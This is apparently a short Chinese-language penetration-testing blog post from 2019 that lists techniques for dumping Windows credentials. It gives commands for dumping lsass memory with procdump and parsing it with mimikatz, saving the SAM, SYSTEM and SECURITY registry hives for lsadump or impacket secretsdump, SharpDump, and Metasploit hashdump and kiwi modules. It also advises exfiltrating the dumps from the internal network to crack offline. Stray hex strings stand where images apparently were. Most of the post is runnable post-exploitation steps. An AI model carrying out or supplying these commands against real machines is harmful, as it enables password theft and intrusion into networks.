@Author: Patrilic
@Time: 2019-05-05 0:20:33

推荐使用 Procdump,reg 和 sharpdump 导出本地,再想办法从内网中运出来本地破解

测试机器: Windows 10 1809

0x01 Procdump + Mimikatz

Procdump
(管理员权限下运行)

1
2
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

ac82bb7eeb7a22a8374cf6d938f39723

然后本地解出hash即可

1
2
sekurlsa::minidump C:\lsass.dmp
sekurlsa::logonpasswords full

8217226578225fab9a1492a3aeca235d

0x02 Reg + impacket/Mimikatz (强推)

使用Reg需要NT/SYSTEM权限

1
2
3
4
5
reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save HKLM\security security.hiv

Mimikatz 调用 lsadump

1
lsadump::sam /system:system.hiv /sam:sam.hiv

db38857f0f6c6dc2c9f9035664e6993d

impacket/secretsdump.py

1
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

242aff6a39bba29a99ef4947d7a99cc2

0x03 Sharpdump (强推)

Out-Minidump.ps1 的 C#版本 编译结果
需要.NET 3.5版本框架
45e9926e499fde1ffa70410d600137ee

0x04 Wce、Quarks PwDump、GetPass……

没怎么用过,都是以前比较老的,Getpass是Mimikatz的编译版本,没啥意思

0x05 Msf modules

hashdump

条件:

  1. Meterpreter Session
  2. NT/SYSTEM

07030d8ceedbedabf174df555d21d903

hashdump只能dump本地用户

smart_hashdump

条件

  1. Meterpreter Session
  2. NT/SYSTEM

ba9d49921ba6634abcc41e4ee0dfc0d1

可以dump本地 + 域用户hash

kiwi

条件

  1. Meterpreter Session
  2. NT/SYSTEM

0bb8fe85b3463c08b98173e8493190df